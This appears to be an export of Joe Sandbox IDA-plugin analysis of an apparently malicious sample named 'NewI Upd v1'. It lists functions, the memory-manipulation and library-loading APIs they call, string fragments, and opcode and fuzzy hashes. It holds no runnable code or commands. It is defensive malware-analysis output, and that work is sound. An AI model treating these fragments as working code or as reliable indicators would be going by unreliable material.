Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: AllocString$BlanketCreateInformationInitInstanceProxyVariantVolume
String ID: :$B,kz$\$\]^_$b1}3$d9y;$dE$de$rs$u=s?$u%w
API String ID: 1810270423-2379762038
Opcode ID: dfae4a3e18d6b9b166b3523c11d2585180d9e070cc0b6874a744cbf27471fc50
Instruction ID: 46931f2b0126f14cbb24c49b3dc15b97a9aa1a811eb456b68feded50f1eec2af
Opcode Fuzzy Hash: dfae4a3e18d6b9b166b3523c11d2585180d9e070cc0b6874a744cbf27471fc50
Instruction Fuzzy Hash: 54120D72A083009BD310CF65D881B5BBBE5EFC9714F14892EF9949B380DB78D905CB9A

Function 00422DA8 Relevance: 32.7, APIs: 1, Strings: 17, Instructions: 1215COMMON

Download Yara Rule

Strings

)&, xrefs: 00423DF3
`E(A, xrefs: 00422E7E
9Z, xrefs: 0042307E
7, xrefs: 00422F34
4=/U, xrefs: 00423193, 00423175
PE, xrefs: 00422DAD
5B, xrefs: 004235D0
)37], xrefs: 00422F6A
wvut, xrefs: 0042347D
hi, xrefs: 00423F13
s, xrefs: 0042315E
/LFN, xrefs: 00422E86
3['E, xrefs: 00423BE5
=04v, xrefs: 00422F62
4=/U, xrefs: 00422F80
wvut, xrefs: 00422E0D
QB, xrefs: 00423086

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: )&$)37]$/LFN$3['E$4=/U$4=/U$7$9Z$=04v$PE$QB$`E(A$hi$s$wvut$wvut$5B
API String ID: 0-3477687257
Opcode ID: 455a8e2786914f071db71330fba20fcd73722c5b98392ed7e6befe84be07cec6
Instruction ID: eaccbec28639dad66b3d56d9852f65a62ccf378925e15a513df039d31ec1de07
Opcode Fuzzy Hash: 455a8e2786914f071db71330fba20fcd73722c5b98392ed7e6befe84be07cec6
Instruction Fuzzy Hash: 8A820EB46083419FD714CF28E89176BBBE1FF86314F58896CE4858B392D739D905CB4A

Function 0040E7AD Relevance: 15.6, APIs: 2, Strings: 8, Instructions: 640
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.OLE32 ref: 0040E7B5
CoUninitialize.COMBASE ref: 0040EB4F

Strings

^Ufa, xrefs: 0040EC34
~43, xrefs: 0040EC16
6G9A, xrefs: 0040EE6C
a]o#, xrefs: 0040EC42
v43, xrefs: 0040EBD7
~43, xrefs: 0040E886
v43, xrefs: 0040E847
OIE;, xrefs: 0040EC50

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: Uninitialize
String ID: 6G9A$OIE;$^Ufa$a]o#$v43$v43$~43$~43
API String ID: 3861434553-1282255561
Opcode ID: 53e4e04492eb6f508a03ba9e07f74e14e84f17865fadc37e12a33e463c850893
Instruction ID: d307ecd3d555fe7f2c60421156369440f60a065389dfa16697d4a3462a20e343
Opcode Fuzzy Hash: 53e4e04492eb6f508a03ba9e07f74e14e84f17865fadc37e12a33e463c850893
Instruction Fuzzy Hash: 0B22D2B52047818FD325CF2AC490662BFE2FF96304B1989ADC0D65F792C37AE816CB55

Function 004237C9 Relevance: 11.1, APIs: 1, Strings: 5, Instructions: 627
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

)&, xrefs: 00423DF3
3['E, xrefs: 00423BE5
5B, xrefs: 004235D0
wvut, xrefs: 0042366D
hi, xrefs: 00423F13

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: )&$3['E$hi$wvut$5B
API String ID: 0-2757989969
Opcode ID: b61a9a04138006db8f7818c13fb7202b9226f6ce124d2ed4416ffb72b38f2d1b
Instruction ID: 87ab717e552cfa7345cae70ed095f7effe2035c3a8ecb19a8652f0f8d304fe99
Opcode Fuzzy Hash: b61a9a04138006db8f7818c13fb7202b9226f6ce124d2ed4416ffb72b38f2d1b
Instruction Fuzzy Hash: 5012DBB5608301CFD704CF29E89166BB7E1FF86314F48893DE5868B362E7389905CB4A

Function 00423960 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 469
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

)&, xrefs: 00423DF3
WT, xrefs: 004239A5
3['E, xrefs: 00423BE5
hi, xrefs: 00423F13

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: )&$3['E$WT$hi
API String ID: 0-2566539442
Opcode ID: 16a6c30e9ae05e6193dff80909fd3a4d7fcdde9c2c5d5c819ce6ba08a850c8fd
Instruction ID: 5425cab7791a3f5709cc17f90c9203181da709ac52fb4b0ed4d6cae0f982c5a3
Opcode Fuzzy Hash: 16a6c30e9ae05e6193dff80909fd3a4d7fcdde9c2c5d5c819ce6ba08a850c8fd
Instruction Fuzzy Hash: A9F1CAB46083418FD704DF25E89262BBBF1FF86304F44892DE5858B351E7798A09CB5B

Function 0042D199 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 421
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042D629

Strings

8, xrefs: 0042D1AB
:8_S, xrefs: 0042D5A8
#<2, xrefs: 0042D55F
:8_S, xrefs: 0042D209

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: #<2$8$:8_S$:8_S
API String ID: 3960555810-1711014019
Opcode ID: ce2c4453b8566232e41b7078700ddb26d60c84cd3a82fbc57576ec9656e9b6f8
Instruction ID: b41c2b6f15fe5ca7851117f4412b1f0257a9303f594137032b6cfe41782a746b
Opcode Fuzzy Hash: ce2c4453b8566232e41b7078700ddb26d60c84cd3a82fbc57576ec9656e9b6f8
Instruction Fuzzy Hash: 8CC10671A0C3918FC329CF2994503ABFFE1AFD6304F1889AED0D997352D6788906CB56

Function 00408780 Relevance: 7.8, APIs: 5, Instructions: 316
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004087A4
GetCurrentThreadId.KERNEL32 ref: 004087AE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040891E
GetForegroundWindow.USER32 ref: 00408AC6
ExitProcess.KERNEL32 ref: 00408B4F

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: d37a260a9ecd85fabef59688b82412c86662cb0cce4fca0a3288464d8c81903f
Instruction ID: 8fc3ef7360a1bfd126cce8819e7641f9da8bcd8e83b5a1da64e32e5f433aa2eb
Opcode Fuzzy Hash: d37a260a9ecd85fabef59688b82412c86662cb0cce4fca0a3288464d8c81903f
Instruction Fuzzy Hash: B0A1E4B7F547104FD308DF69CD9236AB6D2ABC8310F0E853EA889E7395DA789C058785

Function 0042D53A Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 367
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042D629

Strings

:8_S, xrefs: 0042D5A8
#<2, xrefs: 0042D55F

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: #<2$:8_S
API String ID: 3960555810-1117466531
Opcode ID: 18458549155da8a567ec91e5470fa12d1f273227727bde17bf7e5053b90eaa5f
Instruction ID: d59827cbfe0c607f258890ef7f2152e6f978a59b6f25cebf65e1a99b5ddfb7ff
Opcode Fuzzy Hash: 18458549155da8a567ec91e5470fa12d1f273227727bde17bf7e5053b90eaa5f
Instruction Fuzzy Hash: CDA1E471A0C3918FC339CF29D4503ABBBE0AF96304F18896ED4D997342E6798505CB9A

Function 008C06E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008BFFF8: LoadLibraryW.KERNELBASE(00000000,00000000,5FBFF111,00000000), ref: 008C0193

NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000002,00000000,00000000,00000000,082962C8,?,?,008BFA09,?,00000000,?), ref: 008C0729
NtProtectVirtualMemory.NTDLL(000000FF,?,008BFA09,00000000,00000000,00000000,00000000,082962C8,?,?,008BFA09,?,00000000,?), ref: 008C082B

Strings

, xrefs: 008C07BF

Memory Dump Source

Source File: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: MemoryProtectVirtual$LibraryLoad
String ID:
API String ID: 4159661263-3916222277
Opcode ID: 29f9e2d3866784fb39e4acce5980945244bac95dda44c2316337fe1a20b9e87d
Instruction ID: 053fcbc375c0a9faee139e168ca7d2f7754957778a4c1512f0c3757e9e5a7f18
Opcode Fuzzy Hash: 29f9e2d3866784fb39e4acce5980945244bac95dda44c2316337fe1a20b9e87d
Instruction Fuzzy Hash: 974109B5D01209EBDB08CF94C985BFEBBB5FF58315F208159E815AB281D735AA41CFA0

Function 00427220 Relevance: 4.0, Strings: 3, Instructions: 273
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

+w.#, xrefs: 004274BC
1&%2, xrefs: 004274B4
wvut, xrefs: 00427237

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: InitializeThunk
String ID: +w.#$1&%2$wvut
API String ID: 2994545307-2033791228
Opcode ID: a81c3d9d3362e740736c9379727fe0c72f1735c62d437240dcffbe6a543083bf
Instruction ID: 79391495058984a366d31e55b643372171f59db6c11c3e1bcefa991314b8ce07
Opcode Fuzzy Hash: a81c3d9d3362e740736c9379727fe0c72f1735c62d437240dcffbe6a543083bf
Instruction Fuzzy Hash: 03816A7570C3209FD724EB64EC8273BB792DF91318F58457EE9854B392E6389C01C65A

Function 004384A0 Relevance: 2.8, Strings: 2, Instructions: 333COMMON

Download Yara Rule

Strings

wvut, xrefs: 004387EB
wvutwvut, xrefs: 004386A1

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: InitializeThunk
String ID: wvut$wvutwvut
API String ID: 2994545307-1902772994
Opcode ID: cd88c52e2f92706f191ccb82bd1ab95091bdf9e14370203a9c7a89427c9ada3e
Instruction ID: a757432227b8544b7c7b51f4f27899476d9a1d72537a7805d9706169356b55d1
Opcode Fuzzy Hash: cd88c52e2f92706f191ccb82bd1ab95091bdf9e14370203a9c7a89427c9ada3e
Instruction Fuzzy Hash: A1C12936E087548FDB18CB6CC8413AEFBF2AB89314F19456EE496A7382C67D5D01C786

Function 0040C58F Relevance: 2.6, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

>C]z, xrefs: 0040C669
a, xrefs: 0040C5A8

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: >C]z$a
API String ID: 0-1611460902
Opcode ID: d77332064ced0ce4feeb818d2309e1dc824399832648fbbdcbc3f9bd78f61149
Instruction ID: cb682c68824ab18062fd9851a7afa3643033b71ba37c2b0966e6bd7b5f111f66
Opcode Fuzzy Hash: d77332064ced0ce4feeb818d2309e1dc824399832648fbbdcbc3f9bd78f61149
Instruction Fuzzy Hash: DE21DE7675C3059FC3188F68CCC176ABBE2FB86304F14983DE195C7280EAB9D5088B0A

Function 004186C0 Relevance: 1.7, APIs: 1, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b62d32a76ff7fdafa6cb0beae6803d9548eff8e18d89a198335ccd2f2ce4e8d
Instruction ID: b2cfd16e2bc963dec3ec478c6f46fbfd8861683387b57bf4ab09c8eb560d1c97
Opcode Fuzzy Hash: 7b62d32a76ff7fdafa6cb0beae6803d9548eff8e18d89a198335ccd2f2ce4e8d
Instruction Fuzzy Hash: 3E51DBB2A086419FD718CF29C8527ABB7D2ABD5304F14892EE4E9C7381D738DC45CB96

Function 008C01A8 Relevance: 1.7, APIs: 1, Instructions: 162memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 008BFFF8: LoadLibraryW.KERNELBASE(00000000,00000000,5FBFF111,00000000), ref: 008C0193

NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,?,00003000,00000004,00000000,00000000,6793C34C), ref: 008C022A

Memory Dump Source

Source File: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: c329ee17c0eff391a5dc2086750547225e65861cfc00dc49fadffb7d0c864216
Instruction ID: 6ec1620fbfa848261225506a6a265236f26406b1774f717f8ab4b345fa9489ec
Opcode Fuzzy Hash: c329ee17c0eff391a5dc2086750547225e65861cfc00dc49fadffb7d0c864216
Instruction Fuzzy Hash: 9F61E774A00119EBDB04DFA8C885FBEB7B5FF48315F208259E921EB391DA749A41CB61

Function 0043FCB0 Relevance: 1.6, Strings: 1, Instructions: 338COMMON

Download Yara Rule

Strings

x{tu, xrefs: 0043FD4E

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: InitializeThunk
String ID: x{tu
API String ID: 2994545307-3159878047
Opcode ID: 208624ec6d962c9f99d26acb9f85fdec06fdeb2c03f65521581cb493ee30d8f2
Instruction ID: dc4cf60dfb3d4a68555e46df7d5ca5704b16df7d2b2bd881c53c0db1d4874407
Opcode Fuzzy Hash: 208624ec6d962c9f99d26acb9f85fdec06fdeb2c03f65521581cb493ee30d8f2
Instruction Fuzzy Hash: 26A1AA32B083118FD328CF28D8C166BB7A2EBD9314F19D53ED9854B352DA759C0AC785

Function 0043D440 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0044037D,005C003F,00000018,?,?,00000018,?,?,?), ref: 0043D46E

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0040E1A0 Relevance: 1.4, Strings: 1, Instructions: 178COMMON

Download Yara Rule

Strings

690213190D2228369D923F913F8AA6F7, xrefs: 0040E2B8

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: 690213190D2228369D923F913F8AA6F7
API String ID: 0-3295789132
Opcode ID: 03276d07a2122de0223a8a2b95cd246a192901bd24ac87eb402bc8ede7c4cc89
Instruction ID: 0a523fcd6630e50d0ad9310e04b91ff7ebcd477feab9bc524418dea32313a84d
Opcode Fuzzy Hash: 03276d07a2122de0223a8a2b95cd246a192901bd24ac87eb402bc8ede7c4cc89
Instruction Fuzzy Hash: CE517972B006018BD7188F39CC6276BBBA2EFA7324B2D9A7DC596873D6E73854118704

Function 0043F230 Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 0043F280

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: b000e1baa219688d7939f1008ad329f0e235fd7593cd67dfa5c1a830146999d3
Instruction ID: 37a272e4cdc6d31eb26a80c1c2f23e2555dd0ddaabac5eb098f0c3a0221d7adc
Opcode Fuzzy Hash: b000e1baa219688d7939f1008ad329f0e235fd7593cd67dfa5c1a830146999d3
Instruction Fuzzy Hash: E621F0754183049FC310DF19E88066BB7F4FBC9324F14593EE99847310E379A909CB96

Function 008C08B8 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fa9555f37e9bcad40d15a3753f67ec6437df51a323d621172d23e0a63ee3dbc2
Instruction ID: 717c868f3874d74d32510f09a371a0cb5341834c92e08ff455240d9d4674e5e9
Opcode Fuzzy Hash: fa9555f37e9bcad40d15a3753f67ec6437df51a323d621172d23e0a63ee3dbc2
Instruction Fuzzy Hash: 2ED1B774A01208EFDB44DFA8C985AAEB7B5FF48300F648568F504EB382DA75EE41CB51

Function 0043F340 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2bf9a1abd547f570527806fc45f06b18d17dd2f036d5fe9283c30278ecc495bd
Instruction ID: 998b4ad2999a6568f07d22d3a4e7a3ab1dc1709d67eb6c995c7684baec4336a2
Opcode Fuzzy Hash: 2bf9a1abd547f570527806fc45f06b18d17dd2f036d5fe9283c30278ecc495bd
Instruction Fuzzy Hash: 44715736A042055FD715EF28C84067BB3A2EFED350F15943EE8858B362EB389C559389

Function 0043BB40 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 97f55433c743f21062d8074e2e62384338da04d732f7d2539c9287f36ad6d8c9
Instruction ID: e2ad235ece3f08a2024b9ac1385d87e9008771e68e0456000da657492687b8a7
